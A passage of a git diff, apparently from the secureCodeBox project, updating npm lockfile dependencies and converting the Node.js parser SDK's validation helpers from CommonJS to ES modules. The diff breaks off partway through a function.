"https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", - "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", - "requires": { - "assert-plus": "1.0.0", - "extsprintf": "1.3.0", - "json-schema": "0.4.0", - "verror": "1.10.0" - } - }, - "lru-cache": { - "version": "10.4.3", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-10.4.3.tgz", - "integrity": "sha512-JNAzZcXrCt42VGLuYz0zfAzDfAvJWW6AfYlDBQyDV5DClI2m5sAmK+OIO7s59XfsRsWHp02jAJrRadPRGTt6SQ==" - }, "mime-db": { "version": "1.49.0", "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.49.0.tgz", @@ -1722,140 +995,53 @@ "mime-db": "1.49.0" } }, - "minimatch": { - "version": "9.0.5", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-9.0.5.tgz", - "integrity": "sha512-G6T0ZX48xgozx7587koeX9Ys2NYy6Gmv//P89sEte9V9whIapMNF4idKxnW2QtCcLiTWlb/wfCabAtAFWhhBow==", - "requires": { - "brace-expansion": "^2.0.1" - } - }, - "minipass": { - "version": "7.1.2", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-7.1.2.tgz", - "integrity": "sha512-qOOzS1cBTWYF4BH8fVePDBOO9iptMnGUEZwNc/cMWnTV2nVLZ7VoNWEPHkYczZA0pdoA7dl6e7FL659nX9S2aw==" + "ms": { + "version": "2.1.3", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.3.tgz", + "integrity": "sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==" }, - "minizlib": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/minizlib/-/minizlib-3.0.1.tgz", - "integrity": "sha512-umcy022ILvb5/3Djuu8LWeqUa8D68JaBzlttKeMWen48SjabqS3iY5w/vzeMzMUNhLDifyhbOwKDSznB1vvrwg==", + "node-fetch": { + "version": "2.7.0", + "resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-2.7.0.tgz", + "integrity": "sha512-c4FRfUm/dbcWZ7U+1Wq0AwCyFL+3nt2bEw05wfxSz+DWpWsitgmSgYmy2dQdWyKC1694ELPqMs/YzUSNozLt8A==", "requires": { - "minipass": "^7.0.4", - "rimraf": "^5.0.5" + "whatwg-url": "^5.0.0" } }, - "mkdirp": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-3.0.1.tgz", - "integrity": "sha512-+NsyUUAZDmo6YVHzL/stxSu3t9YS1iljliy3BSDrXJ/dkn1KYdmtZODGGjLcc9XLgVVpH4KshHB8XmZgMhaBXg==" - }, - "oauth-sign": { - "version": "0.9.0", - "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", - "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==" - }, "oauth4webapi": { "version": "3.1.3", "resolved": "https://registry.npmjs.org/oauth4webapi/-/oauth4webapi-3.1.3.tgz", - "integrity": "sha512-dik5wEMdFL5p3JlijYvM7wMNCgaPhblLIDCZtdXcaZp5wgu5Iwmsu7lMzgFhIDTi5d0BJo03LVoOoFQvXMeOeQ==", - "optional": true + "integrity": "sha512-dik5wEMdFL5p3JlijYvM7wMNCgaPhblLIDCZtdXcaZp5wgu5Iwmsu7lMzgFhIDTi5d0BJo03LVoOoFQvXMeOeQ==" + }, + "once": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", + "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", + "requires": { + "wrappy": "1" + } }, "openid-client": { "version": "6.1.3", "resolved": "https://registry.npmjs.org/openid-client/-/openid-client-6.1.3.tgz", "integrity": "sha512-74sc0bR4ptfwCwMheLPaJHTQnds+97Yu6O8eQgoO3MRcd53xkfKyl3gNAsRsYSYoO+AVG3eCgnRMjRkZ6n2RYw==", - "optional": true, "requires": { "jose": "^5.9.6", "oauth4webapi": "^3.1.1" } }, - "package-json-from-dist": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/package-json-from-dist/-/package-json-from-dist-1.0.1.tgz", - "integrity": "sha512-UEZIS3/by4OC8vL3P2dTXRETpebLI2NiI5vIrjaD/5UtrkFX/tNbwjTSRAGC/+7CAo2pIcBaRgWmcBBHcsaCIw==" - }, - "path-key": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", - "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==" - }, - "path-scurry": { - "version": "1.11.1", - "resolved": "https://registry.npmjs.org/path-scurry/-/path-scurry-1.11.1.tgz", - "integrity": "sha512-Xa4Nw17FS9ApQFJ9umLiJS4orGjm7ZzwUrwamcGQuHSzDyth9boKDaycYdDcZDuqYATXw4HFXgaqWTctW/v1HA==", - "requires": { - "lru-cache": "^10.2.0", - "minipass": "^5.0.0 || ^6.0.2 || ^7.0.0" - } - }, - "performance-now": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", - "integrity": "sha1-Ywn04OX6kT7BxpMHrjZLSzd8nns=" - }, "proxy-from-env": { "version": "1.1.0", "resolved": "https://registry.npmjs.org/proxy-from-env/-/proxy-from-env-1.1.0.tgz", "integrity": "sha512-D+zkORCbA9f1tdWRK0RaCR3GPv50cMxcrz4X8k5LTSUD1Dkw47mKJEZQNunItRTkWwgtaUSo1RVFRIG9ZXiFYg==" }, - "psl": { - "version": "1.8.0", - "resolved": "https://registry.npmjs.org/psl/-/psl-1.8.0.tgz", - "integrity": "sha512-RIdOzyoavK+hA18OGGWDqUTsCLhtA7IcZ/6NCs4fFJaHBDab+pDDmDIByWFRQJq2Cd7r1OoQxBGKOaztq+hjIQ==" - }, - "punycode": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.1.1.tgz", - "integrity": "sha512-XRsRjdf+j5ml+y/6GKHPZbrF/8p2Yga0JPtdqTIY2Xe5ohJPD9saDJJLPvp9+NSBprVvevdXZybnj2cv8OEd0A==" - }, - "qs": { - "version": "6.5.3", - "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", - "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==" - }, - "request": { - "version": "2.88.2", - "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", - "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", + "pump": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/pump/-/pump-3.0.2.tgz", + "integrity": "sha512-tUPXtzlGM8FE3P0ZL6DVs/3P58k9nk8/jZeQCurTJylQA8qFYzHFfhBJkuqyE0FifOsQ0uKWekiZ5g8wtr28cw==", "requires": { - "aws-sign2": "~0.7.0", - "aws4": "^1.8.0", - "caseless": "~0.12.0", - "combined-stream": "~1.0.6", - "extend": "~3.0.2", - "forever-agent": "~0.6.1", - "form-data": "~2.3.2", - "har-validator": "~5.1.3", - "http-signature": "~1.2.0", - "is-typedarray": "~1.0.0", - "isstream": "~0.1.2", - "json-stringify-safe": "~5.0.1", - "mime-types": "~2.1.19", - "oauth-sign": "~0.9.0", - "performance-now": "^2.1.0", - "qs": "~6.5.2", - "safe-buffer": "^5.1.2", - "tough-cookie": "~2.5.0", - "tunnel-agent": "^0.6.0", - "uuid": "^3.3.2" - }, - "dependencies": { - "form-data": { - "version": "2.3.3", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", - "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", - "requires": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.6", - "mime-types": "^2.1.12" - } - }, - "uuid": { - "version": "3.4.0", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", - "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==" - } + "end-of-stream": "^1.1.0", + "once": "^1.3.1" } }, "require-from-string": { @@ -1868,260 +1054,113 @@ "resolved": "https://registry.npmjs.org/rfc4648/-/rfc4648-1.5.0.tgz", "integrity": "sha512-FA6W9lDNeX8WbMY31io1xWg+TpZCbeDKsBo0ocwACZiWnh9TUAyk9CCuBQuOPmYnwwdEQZmraQ2ZK7yJsxErBg==" }, - "rimraf": { - "version": "5.0.10", - "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-5.0.10.tgz", - "integrity": "sha512-l0OE8wL34P4nJH/H2ffoaniAokM2qSmrtXHmlpvYr5AVVX8msAyW0l8NVJFDxlSK4u3Uh/f41cQheDVdnYijwQ==", - "requires": { - "glob": "^10.3.7" - } - }, - "safe-buffer": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.2.1.tgz", - "integrity": "sha512-rp3So07KcdmmKbGvgaNxQSJr7bGVSVk5S9Eq1F+ppbRo70+YeaDxkw5Dd8NPN+GD6bjnYm2VuPuCXmpuYvmCXQ==" + "smart-buffer": { + "version": "4.2.0", + "resolved": "https://registry.npmjs.org/smart-buffer/-/smart-buffer-4.2.0.tgz", + "integrity": "sha512-94hK0Hh8rPqQl2xXc3HsaBoOXKV20MToPkcXvwbISWLEs+64sBq5kFgn2kJDHb1Pry9yrP0dxrCI9RRci7RXKg==" }, - "safer-buffer": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", - "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" - }, - "shebang-command": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", - "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", + "socks": { + "version": "2.8.5", + "resolved": "https://registry.npmjs.org/socks/-/socks-2.8.5.tgz", + "integrity": "sha512-iF+tNDQla22geJdTyJB1wM/qrX9DMRwWrciEPwWLPRWAUEM8sQiyxgckLxWT1f7+9VabJS0jTGGr4QgBuvi6Ww==", "requires": { - "shebang-regex": "^3.0.0" + "ip-address": "^9.0.5", + "smart-buffer": "^4.2.0" } }, - "shebang-regex": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", - "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==" - }, - "signal-exit": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz", - "integrity": "sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==" - }, - "sshpk": { - "version": "1.16.1", - "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.16.1.tgz", - "integrity": "sha512-HXXqVUq7+pcKeLqqZj6mHFUMvXtOJt1uoUx09pFW6011inTMxqI8BA8PM95myrIyyKwdnzjdFjLiE6KBPVtJIg==", + "socks-proxy-agent": { + "version": "8.0.5", + "resolved": "https://registry.npmjs.org/socks-proxy-agent/-/socks-proxy-agent-8.0.5.tgz", + "integrity": "sha512-HehCEsotFqbPW9sJ8WVYB6UbmIMv7kUUORIF2Nncq4VQvBfNBLibW9YZR5dlYCSUhwcD628pRllm7n+E+YTzJw==", "requires": { - "asn1": "~0.2.3", - "assert-plus": "^1.0.0", - "bcrypt-pbkdf": "^1.0.0", - "dashdash": "^1.12.0", - "ecc-jsbn": "~0.1.1", - "getpass": "^0.1.1", - "jsbn": "~0.1.0", - "safer-buffer": "^2.0.2", - "tweetnacl": "~0.14.0" + "agent-base": "^7.1.2", + "debug": "^4.3.4", + "socks": "^2.8.3" } }, + "sprintf-js": { + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.1.3.tgz", + "integrity": "sha512-Oo+0REFV59/rz3gfJNKQiBlwfHaSESl1pcGyABQsnnIfWOFt6JNj5gCog2U6MLZ//IGYD+nA8nI+mTShREReaA==" + }, "stream-buffers": { "version": "3.0.2", "resolved": "https://registry.npmjs.org/stream-buffers/-/stream-buffers-3.0.2.tgz", "integrity": "sha512-DQi1h8VEBA/lURbSwFtEHnSTb9s2/pwLEaFuNhXwy1Dx3Sa0lOuYT2yNUr4/j2fs8oCAMANtrZ5OrPZtyVs3MQ==" }, - "string-width": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-5.1.2.tgz", - "integrity": "sha512-HnLOCR3vjcY8beoNLtcjZ5/nxn2afmME6lhrDrebokqMap+XbeW8n9TXpPDOqdGK5qcI3oT0GKTW6wC7EMiVqA==", + "streamx": { + "version": "2.22.1", + "resolved": "https://registry.npmjs.org/streamx/-/streamx-2.22.1.tgz", + "integrity": "sha512-znKXEBxfatz2GBNK02kRnCXjV+AA4kjZIUxeWSr3UGirZMJfTE9uiwKHobnbgxWyL/JWro8tTq+vOqAK1/qbSA==", "requires": { - "eastasianwidth": "^0.2.0", - "emoji-regex": "^9.2.2", - "strip-ansi": "^7.0.1" + "bare-events": "^2.2.0", + "fast-fifo": "^1.3.2", + "text-decoder": "^1.1.0" } }, - "string-width-cjs": { - "version": "npm:string-width@4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", + "tar-fs": { + "version": "3.0.9", + "resolved": "https://registry.npmjs.org/tar-fs/-/tar-fs-3.0.9.tgz", + "integrity": "sha512-XF4w9Xp+ZQgifKakjZYmFdkLoSWd34VGKcsTCwlNWM7QG3ZbaxnTsaBwnjFZqHRf/rROxaR8rXnbtwdvaDI+lA==", "requires": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - }, - "dependencies": { - "ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==" - }, - "emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==" - }, - "strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "requires": { - "ansi-regex": "^5.0.1" - } - } - } - }, - "strip-ansi": { - "version": "7.1.0", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-7.1.0.tgz", - "integrity": "sha512-iq6eVVI64nQQTRYq2KtEg2d2uU7LElhTJwsH4YzIHZshxlgZms/wIc4VoDQTlG/IvVIrBKG06CrZnp0qv7hkcQ==", - "requires": { - "ansi-regex": "^6.0.1" - } - }, - "strip-ansi-cjs": { - "version": "npm:strip-ansi@6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "requires": { - "ansi-regex": "^5.0.1" - }, - "dependencies": { - "ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==" - } + "bare-fs": "^4.0.1", + "bare-path": "^3.0.0", + "pump": "^3.0.0", + "tar-stream": "^3.1.5" } }, - "tar": { - "version": "7.4.3", - "resolved": "https://registry.npmjs.org/tar/-/tar-7.4.3.tgz", - "integrity": "sha512-5S7Va8hKfV7W5U6g3aYxXmlPoZVAwUMy9AOKyF2fVuZa2UD3qZjg578OrLRt8PcNN1PleVaL/5/yYATNL0ICUw==", + "tar-stream": { + "version": "3.1.7", + "resolved": "https://registry.npmjs.org/tar-stream/-/tar-stream-3.1.7.tgz", + "integrity": "sha512-qJj60CXt7IU1Ffyc3NJMjh6EkuCFej46zUqJ4J7pqYlThyd9bO0XBTmcOIhSzZJVWfsLks0+nle/j538YAW9RQ==", "requires": { - "@isaacs/fs-minipass": "^4.0.0", - "chownr": "^3.0.0", - "minipass": "^7.1.2", - "minizlib": "^3.0.1", - "mkdirp": "^3.0.1", - "yallist": "^5.0.0" - } - }, - "tough-cookie": { - "version": "2.5.0", - "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", - "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", - "requires": { - "psl": "^1.1.28", - "punycode": "^2.1.1" + "b4a": "^1.6.4", + "fast-fifo": "^1.2.0", + "streamx": "^2.15.0" } }, - "tslib": { - "version": "2.4.1", - "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.4.1.tgz", - "integrity": "sha512-tGyy4dAjRIEwI7BzsB0lynWgOpfqjUdq91XXAlIWD2OwKBH7oCl/GZG/HT4BOHrTlPMOASlMQ7veyTqpmRcrNA==" - }, - "tunnel-agent": { - "version": "0.6.0", - "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", - "integrity": "sha1-J6XeoGs2sEoKmWZ3SykIaPD8QP0=", + "text-decoder": { + "version": "1.2.3", + "resolved": "https://registry.npmjs.org/text-decoder/-/text-decoder-1.2.3.tgz", + "integrity": "sha512-3/o9z3X0X0fTupwsYvR03pJ/DjWuqqrfwBgTQzdWDiQSm9KitAyz/9WqsT2JQW7KV2m+bC2ol/zqpW37NHxLaA==", "requires": { - "safe-buffer": "^5.0.1" + "b4a": "^1.6.4" } }, - "tweetnacl": { - "version": "0.14.5", - "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", - "integrity": "sha1-WuaBd/GS1EViadEIr6k/+HQ/T2Q=" + "tr46": { + "version": "0.0.3", + "resolved": "https://registry.npmjs.org/tr46/-/tr46-0.0.3.tgz", + "integrity": "sha512-N3WMsuqV66lT30CrXNbEjx4GEwlow3v6rr4mCcv6prnfwhS01rkgyFdjPNBYd9br7LpXV1+Emh01fHnq2Gdgrw==" }, - "uri-js": { - "version": "4.4.1", - "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", - "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", - "requires": { - "punycode": "^2.1.0" - } + "undici-types": { + "version": "6.20.0", + "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-6.20.0.tgz", + "integrity": "sha512-Ny6QZ2Nju20vw1SRHe3d9jVu6gJ+4e3+MMpqu7pqE5HT6WsTSlce++GQmK5UXS8mzV8DSYHrQH+Xrf2jVcuKNg==" }, - "verror": { - "version": "1.10.0", - "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", - "integrity": "sha1-OhBcoXBTr1XW4nDB+CiGguGNpAA=", - "requires": { - "assert-plus": "^1.0.0", - "core-util-is": "1.0.2", - "extsprintf": "^1.2.0" - } - }, - "which": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", - "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", - "requires": { - "isexe": "^2.0.0" - } + "webidl-conversions": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/webidl-conversions/-/webidl-conversions-3.0.1.tgz", + "integrity": "sha512-2JAn3z8AR6rjK8Sm8orRC0h/bcl/DqL7tRPdGZ4I1CjdF+EaMLmYxBHyXuKL849eucPFhvBoxMsflfOb8kxaeQ==" }, - "wrap-ansi": { - "version": "8.1.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-8.1.0.tgz", - "integrity": "sha512-si7QWI6zUMq56bESFvagtmzMdGOtoxfR+Sez11Mobfc7tm+VkUckk9bW2UeffTGVUbOksxmSw0AA2gs8g71NCQ==", + "whatwg-url": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/whatwg-url/-/whatwg-url-5.0.0.tgz", + "integrity": "sha512-saE57nupxk6v3HY35+jzBwYa0rKSy0XR8JSxZPwgLr7ys0IBzhGviA1/TUGJLmSVqs8pb9AnvICXEuOHLprYTw==", "requires": { - "ansi-styles": "^6.1.0", - "string-width": "^5.0.1", - "strip-ansi": "^7.0.1" + "tr46": "~0.0.3", + "webidl-conversions": "^3.0.0" } }, - "wrap-ansi-cjs": { - "version": "npm:wrap-ansi@7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "requires": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - }, - "dependencies": { - "ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==" - }, - "ansi-styles": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", - "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", - "requires": { - "color-convert": "^2.0.1" - } - }, - "emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==" - }, - "string-width": { - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "requires": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - } - }, - "strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "requires": { - "ansi-regex": "^5.0.1" - } - } - } + "wrappy": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", + "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" }, "ws": { - "version": "8.18.0", - "resolved": "https://registry.npmjs.org/ws/-/ws-8.18.0.tgz", - "integrity": "sha512-8VbfWfHLbbwu3+N6OKsOMpBdT4kXPDDB9cJk2bJ6mh9ucxdlnNvH1e+roYkKmN9Nxw2yjz7VzeO9oOz2zJ04Pw==", + "version": "8.18.2", + "resolved": "https://registry.npmjs.org/ws/-/ws-8.18.2.tgz", + "integrity": "sha512-DMricUmwGZUVr++AEAe2uiVM7UoO9MAVZMDu05UQOaUII0lp+zOzLLU4Xqh/JvTqklB1T4uELaaPBKyjE1r4fQ==", "requires": {} - }, - "yallist": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-5.0.0.tgz", - "integrity": "sha512-YgvUTfwqyc7UXVMrB+SImsVYSmTS8X/tSrtdNZMImM+n7+QTriRXyXim0mBrTXNeqzVF0KWGgHPeiyViFFrNDw==" } } } diff --git a/parser-sdk/nodejs/package.json b/parser-sdk/nodejs/package.json index c51637abb9..f9e77d0282 100644 --- a/parser-sdk/nodejs/package.json +++ b/parser-sdk/nodejs/package.json @@ -1,13 +1,14 @@ { "name": "@securecodebox/parser-sdk-nodejs", "version": "1.0.0", + "type": "module", "description": "Handles external communication required for all secureCodeBox parsers", "main": "parser-wrapper.js", "keywords": [], "author": "iteratec GmbH", "license": "Apache-2.0", "dependencies": { - "@kubernetes/client-node": "^0.22.3", + "@kubernetes/client-node": "^1.3.0", "ajv": "^8.17.1", "ajv-draft-04": "^1.0.0", "ajv-formats": "^3.0.1", @@ -15,4 +16,4 @@ "jsonpointer": "^5.0.1", "ws": "^8.13.0" } -} +} \ No newline at end of file diff --git a/parser-sdk/nodejs/parser-utils.js b/parser-sdk/nodejs/parser-utils.js index 655b436fe3..5f072896b9 100644 --- a/parser-sdk/nodejs/parser-utils.js +++ b/parser-sdk/nodejs/parser-utils.js @@ -2,26 +2,31 @@ // // SPDX-License-Identifier: Apache-2.0 -const { readFile } = require("node:fs/promises"); -const { randomUUID } = require("node:crypto"); -const Ajv = require("ajv-draft-04"); -const addFormats = require("ajv-formats"); -const jsonpointer = require("jsonpointer"); +import { readFile } from "node:fs/promises"; +import { randomUUID } from "node:crypto"; + +import addFormats from "ajv-formats"; +import { get } from "jsonpointer"; +import Ajv from "ajv-draft-04"; const ajv = new Ajv(); addFormats(ajv); -function addIdsAndDates(findings) { - return findings.map((finding) => { - return { - ...finding, - id: randomUUID(), - parsed_at: new Date().toISOString(), - }; - }); +export async function validate(findings) { + const jsonSchemaString = await readFile( + import.meta.dirname + "/findings-schema.json", + "utf8", + ); + const jsonSchema = JSON.parse(jsonSchemaString); + const validator = ajv.compile(jsonSchema); + const valid = validator(findings); + if (!valid) { + const errorMessage = generateErrorMessage(validator.errors, findings); + throw new Error(errorMessage); + } } -function addScanMetadata(findings, scan) { +export function addScanMetadata(findings, scan) { const scanMetadata = { created_at: scan.metadata.creationTimestamp, name: scan.metadata.name, @@ -35,21 +40,18 @@ function addScanMetadata(findings, scan) { })); } -async function validateAgainstJsonSchema(findings) { - const jsonSchemaString = await readFile( - __dirname + "/findings-schema.json", - "utf8" - ); - const jsonSchema = JSON.parse(jsonSchemaString); - const validator = ajv.compile(jsonSchema); - const valid = validator(findings); - if (!valid) { - const errorMessage = generateErrorMessage(validator.errors, findings); - throw new Error(errorMessage); - } +export function addIdsAndDates(findings) { + return findings.map((finding) => { + return { + ...finding, + id: randomUUID(), + parsed_at: new Date().toISOString(), + }; + }); } -async function addSampleIdsAndDatesAndValidate(findings) { +// used for tests to validate if the parser sets all required fields correctly. Adds sample IDs and Dates to the findings which would normally be set by the parser-sdk. +export async function validateParser(findings) { const sampleScan = { metadata: { creationTimestamp: new Date().toISOString(), @@ -59,23 +61,21 @@ async function addSampleIdsAndDatesAndValidate(findings) { spec: { scanType: "sample-scan-type", }, - } + }; // add sample IDs and Dates only if the findings Array is not empty - const extendedData = addScanMetadata(addIdsAndDates(findings),sampleScan); - return validateAgainstJsonSchema(extendedData); + const extendedData = addScanMetadata(addIdsAndDates(findings), sampleScan); + return validate(extendedData); } function generateErrorMessage(errors, findings) { - errors = errors.map((error) => { - return { - ...error, - invalidValue: jsonpointer.get(findings, error.instancePath), - }; - }); - return JSON.stringify(errors, null, 2); + return JSON.stringify( + errors.map((error) => { + return { + 